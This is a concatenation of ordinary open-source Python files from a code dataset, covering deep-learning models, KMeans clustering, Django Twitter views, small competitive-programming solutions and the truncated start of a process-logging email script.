(2022).\"\"\"\n\n def __init__(self, params, trainable):\n \"\"\"Initializes model.\"\"\"\n self.p = params\n self.trainable = trainable\n self._compile()\n\n\n def _compile(self):\n\n self.model = UNet_emb()\n\n # Set optimizer and loss, if in training mode\n if self.trainable:\n self.optim = Adam(self.model.parameters(),\n lr=self.p.learning_rate,\n betas=self.p.adam[:2],\n eps=self.p.adam[2])\n\n # Learning rate adjustment\n self.scheduler = lr_scheduler.ReduceLROnPlateau(self.optim,\n patience=self.p.nb_epochs/4, factor=0.5, verbose=True)\n\n # Loss function\n if self.p.loss == 'l2':\n self.loss = nn.MSELoss()\n else:\n self.loss = nn.L1Loss()\n\n # CUDA support\n self.use_cuda = torch.cuda.is_available() and self.p.cuda\n if self.use_cuda:\n self.model = self.model.cuda()\n if self.trainable:\n self.loss = self.loss.cuda()\n self.model = torch.nn.DataParallel(self.model)\n\n\n def _print_params(self):\n \"\"\"Formats parameters to print when training.\"\"\"\n\n print('Training parameters: ')\n self.p.cuda = self.use_cuda\n param_dict = vars(self.p)\n pretty = lambda x: x.replace('_', ' ').capitalize()\n print('\\n'.join(' {} = {}'.format(pretty(k), str(v)) for k, v in param_dict.items()))\n print()\n\n\n def save_model(self, epoch, stats, first=False):\n \"\"\"Saves model to files; can be overwritten at every epoch to save disk space.\"\"\"\n\n # Create directory for model checkpoints, if nonexistent\n if first:\n ckpt_dir_name = f'{datetime.now():{self.p.dataset_name}-%m%d-%H%M}'\n if self.p.ckpt_overwrite:\n ckpt_dir_name = self.p.dataset_name\n\n self.ckpt_dir = os.path.join(self.p.ckpt_save_path, ckpt_dir_name)\n if not os.path.isdir(self.p.ckpt_save_path):\n os.mkdir(self.p.ckpt_save_path)\n if not os.path.isdir(self.ckpt_dir):\n os.mkdir(self.ckpt_dir)\n\n # Save checkpoint dictionary\n if self.p.ckpt_overwrite:\n fname_unet = '{}/dehamer-{}.pt'.format(self.ckpt_dir, self.p.dataset_name)\n else:\n valid_loss = stats['valid_loss'][epoch]\n fname_unet = '{}/dehamer-epoch{}-{:>1.5f}.pt'.format(self.ckpt_dir, epoch + 1, valid_loss)\n print('Saving checkpoint to: {}\\n'.format(fname_unet))\n torch.save(self.model.state_dict(), fname_unet)\n\n # Save stats to JSON\n fname_dict = '{}/dehamer-stats.json'.format(self.ckpt_dir)\n with open(fname_dict, 'w') as fp:\n json.dump(stats, fp, indent=2)\n\n\n def load_model(self, ckpt_fname):\n \"\"\"Loads model from checkpoint file.\"\"\"\n\n print('Loading checkpoint from: {}'.format(ckpt_fname))\n if self.use_cuda:\n self.model.load_state_dict(torch.load(ckpt_fname))\n else:\n self.model.load_state_dict(torch.load(ckpt_fname, map_location='cpu'))\n\n\n def _on_epoch_end(self, stats, train_loss, epoch, epoch_start, valid_loader):\n \"\"\"Tracks and saves starts after each epoch.\"\"\"\n # import pdb;pdb.set_trace()\n # Evaluate model on validation set\n print('\\rTesting model on validation set... 
', end='')\n epoch_time = time_elapsed_since(epoch_start)[0]\n valid_loss, valid_time, valid_psnr = self.eval(valid_loader)\n show_on_epoch_end(epoch_time, valid_time, valid_loss, valid_psnr)\n\n # Decrease learning rate if plateau\n self.scheduler.step(valid_loss)\n\n # Save checkpoint\n stats['train_loss'].append(train_loss)\n stats['valid_loss'].append(valid_loss)\n stats['valid_psnr'].append(valid_psnr)\n self.save_model(epoch, stats, epoch == 0)\n\n # Plot stats\n if self.p.plot_stats:\n loss_str = f'{self.p.loss.upper()} loss'\n plot_per_epoch(self.ckpt_dir, 'Valid loss', stats['valid_loss'], loss_str)\n plot_per_epoch(self.ckpt_dir, 'Valid PSNR', stats['valid_psnr'], 'PSNR (dB)')\n\n\n\n def eval(self, valid_loader):\n with torch.no_grad():\n self.model.train(False)\n\n valid_start = datetime.now()\n loss_meter = AvgMeter()\n psnr_meter = AvgMeter()\n\n for batch_idx, (source, target,haze_name) in enumerate(valid_loader):\n if self.use_cuda:\n source = source.cuda()\n target = target.cuda()\n\n # dehaze\n source_dehazed = self.model(source)\n\n # Update loss\n loss = self.loss(source_dehazed, target)\n loss_meter.update(loss.item())\n\n # Compute PSRN\n for i in range(source_dehazed.shape[0]):\n # import pdb;pdb.set_trace()\n source_dehazed = source_dehazed.cpu()\n target = target.cpu()\n psnr_meter.update(psnr(source_dehazed[i], target[i]).item())\n\n valid_loss = loss_meter.avg\n valid_time = time_elapsed_since(valid_start)[0] \n psnr_avg = psnr_meter.avg\n\n return valid_loss, valid_time, psnr_avg \n \n\n def train(self, train_loader, valid_loader): \n \"\"\"Trains denoiser on training set.\"\"\" \n \n self.model.train(True)\n \n if self.p.ckpt_load_path is not None:\n self.model.load_state_dict(torch.load(self.p.ckpt_load_path), strict=False)\n print('The pretrain model is loaded.')\n self._print_params()\n num_batches = len(train_loader)\n assert num_batches % self.p.report_interval == 0, 'Report interval must divide total number of batches'\n\n # Dictionaries of tracked stats\n stats = {'dataset_name': self.p.dataset_name, \n 'train_loss': [],\n 'valid_loss': [], \n 'valid_psnr': []} \n \n # Main training loop \n train_start = datetime.now()\n for epoch in range(self.p.nb_epochs): \n print('EPOCH {:d} / {:d}'.format(epoch + 1, self.p.nb_epochs))\n\n # Some stats trackers\n epoch_start = datetime.now()\n train_loss_meter = AvgMeter()\n loss_meter = AvgMeter()\n time_meter = AvgMeter()\n\n # Minibatch SGD\n for batch_idx, (source, target) in enumerate(train_loader):\n batch_start = datetime.now()\n progress_bar(batch_idx, num_batches, self.p.report_interval, loss_meter.val)\n\n \n if self.use_cuda:\n source = source.cuda()\n target = target.cuda()\n\n # Denoise image\n source_dehazed = self.model(source)\n\n loss = self.loss(source_dehazed, target)\n loss_meter.update(loss.item())\n\n # Zero gradients, perform a backward pass, and update the weights\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n \n # Report/update statistics\n time_meter.update(time_elapsed_since(batch_start)[1])\n if (batch_idx + 1) % self.p.report_interval == 0 and batch_idx:\n show_on_report(batch_idx, num_batches, loss_meter.avg, time_meter.avg)\n train_loss_meter.update(loss_meter.avg)\n loss_meter.reset()\n time_meter.reset()\n\n # Epoch end, save and reset tracker\n self._on_epoch_end(stats, train_loss_meter.avg, epoch, epoch_start, valid_loader)\n train_loss_meter.reset()\n\n train_elapsed = time_elapsed_since(train_start)[0]\n print('Training done! 
Total elapsed time: {}\\n'.format(train_elapsed))\n\n\n\n\n","repo_name":"Li-Chongyi/Dehamer","sub_path":"src/dehamer_model.py","file_name":"dehamer_model.py","file_ext":"py","file_size_in_byte":8321,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"40"} +{"seq_id":"3815386564","text":"from tkinter import filedialog\n\nclass FileDialogHelper:\n @staticmethod\n def select_image_folder(entry):\n folder_selected = filedialog.askdirectory()\n entry.set(folder_selected)\n\n @staticmethod\n def select_excel_path(entry):\n file_selected = filedialog.asksaveasfilename(\n defaultextension=\".xlsx\",\n filetypes=[(\"Excel files\", \"*.xlsx\")]\n )\n entry.set(file_selected)\n\n @staticmethod\n def select_output_folder(entry):\n folder_selected = filedialog.askdirectory()\n entry.set(folder_selected)\n","repo_name":"andrescarcia/OCR_MT2005","sub_path":"filedialog_helper.py","file_name":"filedialog_helper.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17391617508","text":"from math import factorial as fact\n\nt = int(input())\n\nfor test in range(0,t):\n n = int(input())\n x = fact(n);\n sum = 0;\n while x:\n sum = sum+ (x%10)\n x = x//10\n print(sum)\n","repo_name":"Alberto-SC/Competitive-Programming-solutions","sub_path":"hackerrank/Project euler/20.Factorial_digit_sum.py","file_name":"20.Factorial_digit_sum.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24195421055","text":"from copy import deepcopy\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport torch.nn.init as init\nfrom weight_init import weight_init_\n\n# def einsum(x, A):\n# return torch.einsum(\"nctkv,kvw->nctw\", [x, A])\n\ndef einsum(x : torch.Tensor, A : torch.Tensor):\n \"\"\"paddle.einsum will be implemented in release/2.2.\n \"\"\"\n # x = x.transpose((0, 2, 3, 1, 4))\n x = x.transpose(1, 2).transpose(2, 3)\n n, c, t, k, v = x.shape\n k2, v2, w = A.shape\n assert (k == k2 and v == v2), \"Args of einsum not match!\"\n x = x.reshape((n, c, t, k * v))\n A = A.reshape((k * v, w))\n y = torch.matmul(x.to(torch.float32), A.to(torch.float32))\n return y\n\ndef get_hop_distance(num_node, edge, max_hop=1): # 获取图上两点边距离\n A = np.zeros((num_node, num_node))\n for i, j in edge:\n A[j, i] = 1\n A[i, j] = 1\n\n # compute hop steps\n hop_dis = np.zeros((num_node, num_node)) + np.inf\n transfer_mat = [np.linalg.matrix_power(A, d) for d in range(max_hop + 1)]\n arrive_mat = (np.stack(transfer_mat) > 0)\n for d in range(max_hop, -1, -1):\n hop_dis[arrive_mat[d]] = d\n return hop_dis\n\ndef normalize_digraph(A):\n Dl = np.sum(A, 0)\n num_node = A.shape[0]\n Dn = np.zeros((num_node, num_node))\n for i in range(num_node):\n if Dl[i] > 0:\n Dn[i, i] = Dl[i]**(-1)\n AD = np.dot(A, Dn)\n return AD\n\nclass Graph():\n\n def __init__(self,\n layout='openpose',\n strategy='uniform',\n max_hop=1,\n dilation=1):\n self.max_hop = max_hop\n self.dilation = dilation\n\n self.get_edge(layout)\n self.hop_dis = get_hop_distance(self.num_node,\n self.edge,\n max_hop=max_hop)\n self.get_adjacency(strategy)\n\n def __str__(self):\n return self.A\n\n def get_edge(self, layout):\n # edge is a list of [child, parent] paris\n\n if layout == 'fsd10': # from openpose body-25\n self.num_node = 25\n self_link = [(i, i) for i in range(self.num_node)]\n neighbor_link = [(1, 8), 
(0, 1), (15, 0), (17, 15), (16, 0),\n (18, 16), (5, 1), (6, 5), (7, 6), (2, 1), (3, 2),\n (4, 3), (9, 8), (10, 9), (11, 10), (24, 11),\n (22, 11), (23, 22), (12, 8), (13, 12), (14, 13),\n (21, 14), (19, 14), (20, 19)]\n self.edge = self_link + neighbor_link\n self.center = 8\n elif layout == 'ntu-rgb+d':\n self.num_node = 25\n self_link = [(i, i) for i in range(self.num_node)]\n neighbor_1base = [(1, 2), (2, 21), (3, 21), (4, 3), (5, 21), (6, 5),\n (7, 6), (8, 7), (9, 21), (10, 9), (11, 10),\n (12, 11), (13, 1), (14, 13), (15, 14), (16, 15),\n (17, 1), (18, 17), (19, 18), (20, 19), (22, 23),\n (23, 8), (24, 25), (25, 12)]\n neighbor_link = [(i - 1, j - 1) for (i, j) in neighbor_1base]\n self.edge = self_link + neighbor_link\n self.center = 21 - 1\n elif layout == 'coco_keypoint':\n self.num_node = 17\n self_link = [(i, i) for i in range(self.num_node)]\n neighbor_1base = [(0, 1), (0, 2), (1, 3), (2, 4), (3, 5), (4, 6),\n (5, 7), (6, 8), (7, 9), (8, 10), (5, 11), (6, 12),\n (11, 13), (12, 14), (13, 15), (14, 16), (11, 12)]\n neighbor_link = [(i, j) for (i, j) in neighbor_1base]\n self.edge = self_link + neighbor_link\n self.center = 11\n else:\n raise ValueError(\"Do Not Exist This Layout.\")\n\n def get_adjacency(self, strategy):\n valid_hop = range(0, self.max_hop + 1, self.dilation)\n adjacency = np.zeros((self.num_node, self.num_node))\n for hop in valid_hop:\n adjacency[self.hop_dis == hop] = 1\n normalize_adjacency = normalize_digraph(adjacency)\n\n if strategy == 'spatial':\n A = []\n for hop in valid_hop:\n a_root = np.zeros((self.num_node, self.num_node))\n a_close = np.zeros((self.num_node, self.num_node))\n a_further = np.zeros((self.num_node, self.num_node))\n for i in range(self.num_node):\n for j in range(self.num_node):\n if self.hop_dis[j, i] == hop:\n if self.hop_dis[j, self.center] == self.hop_dis[\n i, self.center]:\n a_root[j, i] = normalize_adjacency[j, i]\n elif self.hop_dis[j, self.center] > self.hop_dis[\n i, self.center]:\n a_close[j, i] = normalize_adjacency[j, i]\n else:\n a_further[j, i] = normalize_adjacency[j, i]\n if hop == 0:\n A.append(a_root)\n else:\n A.append(a_root + a_close)\n A.append(a_further)\n A = np.stack(A)\n self.A = A\n else:\n raise ValueError(\"Do Not Exist This Strategy\")\n\nclass ConvTemporalGraphical(nn.Module): # 时间维度图卷积\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size, # spatial_kernel_size\n t_kernel_size=1, # 时间卷积核大小\n t_stride=1, # 时间卷积核步幅\n t_padding=0, # 时间卷积核边距填充\n t_dilation=1): # 扩展倍数?\n super().__init__()\n\n self.kernel_size = kernel_size\n self.conv = nn.Conv2d(in_channels,\n out_channels * kernel_size,\n kernel_size=(t_kernel_size, 1),\n padding=(t_padding, 0),\n stride=(t_stride, 1),\n dilation=(t_dilation, 1))\n\n def forward(self, x : np.ndarray, A):\n assert A.shape[0] == self.kernel_size\n\n x = self.conv(x)\n n, kc, t, v = x.shape\n x = x.reshape((n, self.kernel_size, kc // self.kernel_size, t, v))\n x = einsum(x, A)\n\n return x, A\n\nclass st_gcn_block(nn.Module):\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size, # kernel_size = (temporal_kernel_size, spatial_kernel_size)\n stride=1,\n dropout=0,\n residual=True):\n super(st_gcn_block, self).__init__()\n\n assert len(kernel_size) == 2\n assert kernel_size[0] % 2 == 1\n padding = ((kernel_size[0] - 1) // 2, 0)\n\n # ?\n\n self.gcn = ConvTemporalGraphical(in_channels, out_channels, # 图卷积网络\n kernel_size[1])\n\n self.tcn = nn.Sequential( # 时间卷积网络\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.Conv2d(\n out_channels,\n 
out_channels,\n (kernel_size[0], 1),\n (stride, 1),\n padding,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout),\n )\n\n if not residual:\n self.residual = lambda x : 0 # zero\n\n elif (in_channels == out_channels) and (stride == 1):\n self.residual = lambda x : x # iden\n\n else:\n self.residual = nn.Sequential(\n nn.Conv2d(in_channels,\n out_channels,\n kernel_size=1,\n stride=(stride, 1)),\n nn.BatchNorm2d(out_channels),\n )\n\n self.relu = nn.ReLU()\n\n def forward(self, x, A):\n res = self.residual(x)\n x, A = self.gcn(x, A)\n x = self.tcn(x) + res\n return self.relu(x), A\n\nclass STGCN(nn.Module):\n \"\"\"\n ST-GCN model from:\n `\"Spatial Temporal Graph Convolutional Networks for Skeleton-Based Action Recognition\" <https://arxiv.org/abs/1801.07455>`_\n Args:\n in_channels: int, channels of vertex coordinate. 2 for (x,y), 3 for (x,y,z). Default 2.\n edge_importance_weighting: bool, whether to use edge attention. Default True.\n data_bn: bool, whether to use data BatchNorm. Default True.\n \"\"\"\n\n def __init__(self,\n num_classes,\n in_channels=2,\n edge_importance_weighting=True,\n data_bn=True,\n layout='fsd10',\n strategy='spatial',\n device='cpu',\n **kwargs):\n super(STGCN, self).__init__()\n self.data_bn = data_bn\n self.device = device\n # load graph\n self.graph = Graph( # 创建图并定义分组策略\n layout=layout,\n strategy=strategy,\n )\n # A = torch.to_tensor(self.graph.A, dtype='float32')\n # self.register_buffer('A', A) # 取出图中的矩阵,[并将矩阵存储到类中,该矩阵不会参与计算](?)\n A = deepcopy(self.graph.A)\n self.A = A\n\n # build networks 网络结构\n spatial_kernel_size = A.shape[0]\n temporal_kernel_size = 9\n kernel_size = (temporal_kernel_size, spatial_kernel_size)\n self.data_bn = nn.BatchNorm1d(in_channels *\n A.shape[1]) if self.data_bn else (lambda x : x)\n kwargs0 = {k: v for k, v in kwargs.items() if k != 'dropout'}\n self.st_gcn_networks = nn.Sequential(\n st_gcn_block(in_channels,\n 64,\n kernel_size,\n 1,\n residual=False,\n **kwargs0),\n st_gcn_block(64, 64, kernel_size, 1, **kwargs),\n st_gcn_block(64, 64, kernel_size, 1, **kwargs),\n st_gcn_block(64, 64, kernel_size, 1, **kwargs),\n st_gcn_block(64, 128, kernel_size, 2, **kwargs),\n st_gcn_block(128, 128, kernel_size, 1, **kwargs),\n st_gcn_block(128, 128, kernel_size, 1, **kwargs),\n st_gcn_block(128, 256, kernel_size, 2, **kwargs),\n st_gcn_block(256, 256, kernel_size, 1, **kwargs),\n st_gcn_block(256, 256, kernel_size, 1, **kwargs),\n )\n\n # initialize parameters for edge importance weighting 边注意力权重\n if edge_importance_weighting: # todo: fix parameter problem when enable edge importance weighting\n self.edge_importance = nn.ParameterList([\n nn.parameter(\n shape=self.A.shape,\n default_initializer=init.constant(1)) # 默认初始化为常数1\n for _ in self.st_gcn_networks\n ])\n else:\n self.edge_importance = [1] * len(self.st_gcn_networks)\n\n self.pool = nn.AdaptiveAvgPool2d(output_size=(1, 1)) # 池化层\n\n self.classify = nn.Linear(256, num_classes)\n\n def init_weights(self):\n \"\"\"Initiate the parameters.\n \"\"\"\n for layer in self.get_submodule():\n if isinstance(layer, nn.Conv2d):\n weight_init_(layer, 'Normal', mean=0.0, std=0.02)\n elif isinstance(layer, nn.BatchNorm2d):\n weight_init_(layer, 'Normal', mean=1.0, std=0.02)\n elif isinstance(layer, nn.BatchNorm1d):\n weight_init_(layer, 'Normal', mean=1.0, std=0.02)\n elif isinstance(layer, nn.Linear):\n nn.init.xavier_uniform_(layer.weight)\n\n def forward(self, x : torch.Tensor):\n # data normalization\n N, C, T, V, M = x.shape\n # 样本数(1), [x, y, 置信度](openpose, 3), 帧(1500), 
关节点数量(body_25, 25), 运动员数量(1)\n # x = x.transpose((0, 4, 3, 1, 2)) # N, M, V, C, T\n x = x.transpose(1, 4).transpose(2, 4).transpose(2, 3)\n x = x.reshape((N * M, V * C, T)) # 样本*运动员数量, 帧内关节点矩阵(3, 25), 帧\n if self.data_bn: # 批量归一化\n x.stop_gradient = False\n x = self.data_bn(x)\n x = x.reshape((N, M, V, C, T))\n # x = x.transpose((0, 1, 3, 4, 2)) # N, M, C, T, V\n x = x.transpose(2, 3).transpose(3, 4)\n x = x.reshape((N * M, C, T, V))\n\n A = torch.tensor(self.A).to(self.device)\n\n # forward\n for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):\n x, _ = gcn(x, torch.multiply(A, torch.tensor([importance]).to(self.device)))\n\n x = self.pool(x) # NM,C,T,V --> NM,C,1,1\n C = x.shape[1]\n x = torch.reshape(x, (N, M, C)).mean(axis=1) # N,C,1,1\n x = self.classify(x)\n return x\n","repo_name":"LuoXishuang0712/STGCN_PyTorch","sub_path":"stgcn.py","file_name":"stgcn.py","file_ext":"py","file_size_in_byte":13014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33133320029","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\nimport time\n\n## Buiding KMeans algorithms from scrath\nclass KMeans_TG:\n ## coordinates : Data points on which clusters are to be made\n ## no_of_clusters : Total number of clusters to be formed, default 3\n ## plot : 0 - no plot, 1 - original data points with centroids, 2 - plot clusters (3D can be done too)\n ## max_iter : max number iterations to try for stable clusters\n def __init__(self,coordinates,no_of_clusters=3,plot=0,max_iter=30):\n self.max_iter=max_iter\n self.plot=plot\n\n # Convert coordinates to numpy array\n if type(coordinates)!=np.ndarray:\n coordinates=np.array(coordinates)\n \n # Dimension of dataset \n n_d=coordinates.shape[1]\n centroids=[]\n self.n_d=n_d\n \n # Initializing centroids for all dimension\n for d in range(n_d):\n min_val=min(coordinates[:,d])\n max_val=max(coordinates[:,d])\n \n # Generating random centroids within the dataset range\n centroids_d=KMeans_TG.generate_centroids(min_val,max_val,no_of_clusters)\n centroids.append(centroids_d)\n \n # Transposing it to align at coordinates level\n centroids=np.array(centroids).T\n self.coordinates=coordinates\n self.centroids=centroids\n self.no_of_clusters=no_of_clusters\n\n # Generating random centroids \n def generate_centroids(min_val,max_val,no_of_points):\n coordinates=[]\n for n in range(no_of_points):\n d=random.randint(min_val,max_val)\n coordinates.append(d)\n return coordinates\n\n # Calculating sum of distances between new and old centroids\n def cal_diff(self):\n dist=0\n for centroid in range(len(self.centroids)):\n dist+=math.dist(self.new_centroids[centroid],self.centroids[centroid])\n return dist\n \n def KMeans_loop(self,count):\n if self.plot==1:\n plt.clf()\n colours=['red','yellow','blue','black','orange']\n plt.scatter(self.coordinates[:,0],self.coordinates[:,1],color='green')\n for x in range(self.no_of_clusters):\n plt.scatter(self.centroids[x][0],self.centroids[x][1],color=colours[x%5])\n plt.show()\n cluster_dict={}\n centroids_data={}\n for centroid in range(len(self.centroids)):\n cluster_dict[centroid]=[]\n centroids_data[centroid]=self.centroids[centroid]\n for pair in self.coordinates:\n min_dist=100000\n cluster=0\n for centroid in range(len(self.centroids)):\n dist=math.dist(pair,self.centroids[centroid])\n if dist<min_dist:\n min_dist=dist\n cluster=centroid\n cluster_dict[cluster].append(pair)\n\n 
new_centroids=[]\n self.cluster_dict=cluster_dict\n for centroid in range(len(self.centroids)):\n cluster_dict[centroid]=np.array(cluster_dict[centroid])\n new_centroids_d=[]\n for d in range(self.n_d):\n mean_val=cluster_dict[centroid][:,d].mean()\n new_centroids_d.append(mean_val) \n new_centroids.append(tuple(new_centroids_d))\n self.new_centroids=new_centroids\n if self.plot==2:\n if self.n_d>=3:\n print(\"Cannot plot more than 3 dimensions\")\n plt.clf()\n colours=['red','yellow','blue','black','orange','cyan','magenta','white','green']\n if self.n_d==3:\n \n fig = plt.figure()\n ax = Axes3D(fig)\n ax.set_zlabel('z-axis')\n \n for x in range(self.no_of_clusters):\n if self.n_d==3:\n ax.scatter(cluster_dict[x][:,0],cluster_dict[x][:,1],cluster_dict[x][:,2],colours[x])\n if self.n_d==2:\n plt.scatter(cluster_dict[x][:,0],cluster_dict[x][:,1],color=colours[x])\n if self.n_d==1:\n plt.scatter(cluster_dict[x].flatten(),[0]*len(cluster_dict[x]),color=colours[x])\n plt.show()\n self.cluster_dict=cluster_dict\n\n def fit(self):\n start = time.time()\n\n print(\"Fitting \",self.no_of_clusters,\" clusters\")\n print(\"Shape of input data : \",self.coordinates.shape)\n count=1\n print(\"Running iteration :\",count)\n self.KMeans_loop(count)\n print(\"Total Distance between coordinates :\",self.cal_diff())\n while not np.array_equal(self.new_centroids,self.centroids):\n self.centroids=self.new_centroids\n count+=1\n print(\"Running iteration :\",count)\n self.KMeans_loop(count)\n print(\"Total Distance between coordinates :\",self.cal_diff())\n if count>=self.max_iter:\n break\n end = time.time()\n print(\"Total time taken (in seconds) : \",round(end - start,2))\n return\n \n def predict(self,data):\n start = time.time()\n cluster_dict={}\n for centroid in range(len(self.centroids)):\n cluster_dict[centroid]=[]\n for pair in data:\n min_dist=100000\n cluster=0\n for centroid in range(len(self.centroids)):\n dist=math.dist(pair,self.centroids[centroid])\n if dist<min_dist:\n min_dist=dist\n cluster=centroid\n cluster_dict[cluster].append(pair)\n\n end = time.time()\n print(\"Total time taken (in seconds) : \",round(end - start,2))\n return cluster_dict \n\n \n \n ","repo_name":"Tarungarg98/ML_Algos","sub_path":"Unsupervised_TG.py","file_name":"Unsupervised_TG.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29601640548","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom feed.utils import *\nfrom django.template import loader\nfrom django.urls import reverse\nfrom .formfile import TokenForm\n\n\ndef checkAuth(request):\n access_token_temp = request.session.get('access_token', None)\n access_token_secret_temp = request.session.get('access_token_secret', None)\n if access_token_temp is None or access_token_secret_temp is None:\n return redirect('/auth/authorize/')\n else:\n return redirect(reverse('hashTag'))\n\n\ndef autho(request):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n try:\n redirect_url = auth.get_authorization_url()\n except tweepy.TweepError:\n return HttpResponse('Error! 
Failed to get request token.')\n request.session['request_token'] = auth.request_token\n template = loader.get_template('feed/basic.html')\n form = TokenForm()\n context = {\n 'url': redirect_url,\n 'form': form,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef hello(request):\n return HttpResponse(\"hello\")\n\n\ndef authorize(request):\n if request.method == 'POST':\n form = TokenForm(request.POST)\n if form.is_valid():\n token = form.cleaned_data['token']\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n rt = request.session['request_token']\n del request.session['request_token']\n auth.request_token = rt\n try:\n a, b = auth.get_access_token(token)\n except tweepy.TweepError:\n return HttpResponse(\"invalid token\")\n auth.set_access_token(a, b)\n request.session['access_token'] = a\n request.session['access_token_secret'] = b\n return redirect(reverse('feed'))\n else:\n return redirect(reverse('index'))\n\n\ndef feed(request):\n api = completeAuth(request)\n public_tweets = api.home_timeline()\n context = {\n 'api': api,\n 'pt': public_tweets,\n }\n template = loader.get_template('feed/tweets.html')\n return HttpResponse(template.render(context, request))\n\n\ndef hashtagFeed(request):\n api = completeAuth(request)\n res = requests.get('https://ipinfo.io/')\n res_json = res.json()\n coords = res_json['loc'].split(',')\n text = api.trends_closest(coords[0], coords[1])\n pid = text[0]['woeid']\n hashtags = api.trends_place(pid)[0]['trends']\n context = {\n 'hashtags': hashtags,\n }\n template = loader.get_template('feed/trending_tags.html')\n return HttpResponse(template.render(context, request))\n\n\ndef logout(request):\n request.session.flush()\n return redirect(reverse('index'))\n\n\n\n\n\n\n","repo_name":"hitanshu310/twitter_news","sub_path":"Tnews/feed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36442835034","text":"# 予想されたAC時間は30 minsやったが、実際は6分でAC\nfrom collections import Counter\n\nN = int(input())\nr = list(input())\ndic = Counter(r)\n# 変数名に標準ライブラリ関数と被る単語は使わないでおこう\ntot = 0\nfor k, v in dic.items():\n if k == \"A\":\n tot += 4 * v\n elif k == \"B\":\n tot += 3 * v\n elif k == \"C\":\n tot += 2 * v\n elif k == \"D\":\n tot += 1 * v\n else:\n tot += 0 * v\n\nans = tot / N\n\nprint(ans)\n","repo_name":"poponzu/atcoder1","sub_path":"atcoder/ARC/3/arc_3_a.py","file_name":"arc_3_a.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35652222518","text":"import xlsxwriter as xl;\n\nbook = xl.Workbook ('cpp.xlsx');\nsheet = book.add_worksheet ();\nquestions = open ('ans', 'r').readlines ();\n#answers = open ('ans', 'r').readlines ();\nsols = [];\nq_num = 1;\nopt_num = 1;\n\nfor i in range (len (questions)):\n\tif ('. ' in questions [i]):\n\t\tif (questions [i] [0].isnumeric ()):\n\t\t\t#QUESTION\n\t\t\topt_num = 1;\n\t\t\tques = questions [i] [questions [i].index ('. ')+2 : ];\n\n\t\t\tcounter = i + 1;\n\t\t\twhile ('. ' not in questions [counter]):\n\t\t\t\tques += questions [counter];\n\t\t\t\tcounter += 1;\n\n\t\t\tsheet.write ('A' + str (q_num), ques);\n\t\t\tprint (q_num, ques)\n\t\t\tq_num += 1;\n\t\telse:\n\t\t\t#OPTION\n\t\t\toption = questions [i] [questions [i].index ('. ')+2 : ];\n\t\t\tcounter = i + 1;\n\t\t\twhile (counter < len (questions) and '. 
' not in questions [counter]):\n\t\t\t\toption += questions [counter];\n\t\t\t\tcounter += 1;\n\n\t\t\tsheet.write (chr (70 + opt_num) + str (q_num-1), option)\n\t\t\tprint (opt_num, option);\n\t\t\topt_num += 1;\n\n'''\nques_num = 1;\nfor line in answers:\n\tprint (ord (line [-2])-64);\n#\tques_num += 1;\n#\tsheet.write ('L' + str (ques_num), ord (line [-2]) - 96);\n\t\t\t\n'''\n'''\nques_num = 1;\nnenc = True;\nfor char in answers:\n\tif (char.isalpha ()):\n\t\tif (ques_num == 93 and nenc):\n\t\t\tnenc = False;\n\t\t\tcontinue;\n\t\tsols.append ( (ques_num, ord (char) - 96) );\n\t\tsheet.write ('L' + str (ques_num), ord (char) - 96);\n\t\tques_num += 1;\n'''\n\nbook.close ();\n","repo_name":"duaraghav8/Scrapers","sub_path":"makexl.py","file_name":"makexl.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22492104982","text":"import os\nimport sys\nimport time\nimport psutil\nimport urllib.request as urllib2\nimport smtplib\nimport schedule\nfrom sys import *\nfrom email import encoders\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\n\ndef is_connected():\n\ttry:\n\t\turllib2.urlopen('http://216.58.192.142',timeout=1)\n\t\treturn True\n\texcept urllib2.URLError as err:\n\t\treturn False\ndef MailSender(filename, time):\n\ttry:\n\t\turllib2.urlopen('http://216.58.192.142',timeout=1)\n\t\tfromaddr = \"senderMail@gmail.com\"\n\t\ttoaddr = \"receiverMail@gmail.com\"\n\t\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = fromaddr\n\t\tmsg['to'] = sys.argv[1]\n\n\t\tbody = \"\"\"\n\t\tHello %s, Please find attached document which contains log of Running process.\n\t\tLog file is created at :%s\t\n\t\t\n\t\tThis is auto generated mail\n\t\tThanks & Regards,\n\t\tAkshay Pawar.\"\"\"%(toaddr,time)\n\n\t\tSubject = \"\"\"Akshay Pawar Process log generated at :%s\"\"\"%(time)\n\n\t\tmsg['Subject'] = Subject\n\n\t\tmsg.attach(MIMEText(body,'plain'))\n\n\t\tattachment = open(filename, \"rb\")\n\t\tp = 